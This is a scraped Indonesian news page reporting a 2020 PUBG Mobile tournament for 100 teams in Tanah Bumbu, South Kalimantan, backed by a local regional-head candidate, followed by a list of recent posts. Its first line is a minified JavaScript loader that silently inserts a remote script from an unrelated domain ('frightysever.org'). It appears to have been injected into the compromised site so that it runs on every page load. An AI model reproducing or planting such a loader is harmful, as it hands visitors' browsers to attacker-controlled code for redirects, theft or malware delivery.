(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: Sport

100 Tim Siap Berlaga, Cuncung Dukung Gamers Milenial Kalsel


KANALKALIMANTAN.COM, BATULICIN – Tournament PUBG Mobile Trophy Offline Bekantan bakal dihelat di Kabupaten Tanah Bumbu.

Turnamen game mobile genre battle royale digagas Komunitas Bekantan Esports didukung Seni Kreatif Tanah Bumbu bakal diikuti 100 tim lintas kabupaten.

Kompetisi anak muda ini mendapat dukungan penuh dari Syafruddin H Maming (Cuncung) dan M Alpiya Rakhman, bakal pasangan calon kepala daerah Tanah Bumbu.

“Kegiatan ini sangat positif, sepenuhnya kita dukung. Dengan kegiatan hobi seperti ini dapat menghindarkan kaum milenial dari bahaya narkoba,” ujar Cuncung, Rabu (16/9/2020).

Cuncung sadar betul bahwa di era saat ini banyak anak muda memilih game online sebagai hobi.

Bahkan tak sedikit yang mencari pundi rupiah melalui game dalam jaringan. Ia pun berkomitmen mendukung hal tersebut.

“PUBG Mobile Indonesia sudah mengharumkan nama Indonesia di kancah internasional dengan menjadi juara dunia dan menjadi pemain terbaik dunia 2019,” jelasnya.

“Dan tahun ini juga Tim PUBG Mobile Indonesia memberikan hadiah Hari Kemerdekaan Indonesia ke-75 sebagai juara PMWL East 2020. Dan ini harus tetap dipertahankan,” bebernya.

Pelaksanaan turnamen ini dimulai dengan babak penyisihan pada 18-19 September 2020 di kediaman anggota DPR RI, jalan Cappa Padang.

Kemudian berlanjut ke babak semifinal pada 25 September dan final 26 September 2020 yang pelaksanaannya juga ditempat yang sama.

Turnamen PUBG Mobile Trophy Offline Bekantan ini diikuti 100 tim yang setiap tim terdiri 5 orang yakni 4 pemain dan 1 cadangan.

Dari 100 tim yang ikut serta, 70 persen dari Tanah Bumbu dan selebihnya dari Kotabaru, Banjarmasin dan Pelaihari.

Turnamen ini juga dapat disaksikan live streaming melalui melalui akun YouTube Syafruddin H Maming. (kanalkalimantan.com/rls)

Reporter : rls
Editor : kk

Al Ghifari

Recent Posts

“Embroidery Mini Class” Perayaan Hari Kartini di Lingkungan PLN UIP3B Kalimantan

KANALKALIMANTAN.COM, BANJARBARU - Memperingati Hari Kartini 2024 PT PLN (Persero) Unit Induk Penyaluran dan Pusat… Read More

3 jam ago

Sejarah Hari Tari Sedunia 29 April

KANALKALIMANTAN.COM – Setiap tanggal 29 April diperingati salah satu seni atau ekspresi diri yang tertua… Read More

6 jam ago

Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

KANALKALIMANTAN.COM, BANJARMASIN - Unit Pelaksana Teknis Daerah (UPTD) Taman Budaya Provinsi Kalimantan Selatan (Kalsel) menyelenggarakan… Read More

6 jam ago

Rakerda KNPI Banjarbaru, Rekomendasi Pendirian Gedung Pemuda

KANALKALIMANTAN.COM, BANJARBARU - Dewan Pengurus Daerah (DPD) Komite Nasional Pemuda Indonesia (KNPI) Kota Banjarbaru menggelar… Read More

8 jam ago

Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Semangat memperingati Hari Kartini 2024, PT PLN (Persero) Unit Induk Penyaluran dan… Read More

10 jam ago

Konser Malam Pestaforia Kapuas 2024

KANALKALIMANTAN.COM, KUALA KAPUAS – “Konser Malam Pestaforia Kapuas 2024” menyemarakan Hari Jadi ke-218 Kota Kuala… Read More

11 jam ago

This website uses cookies.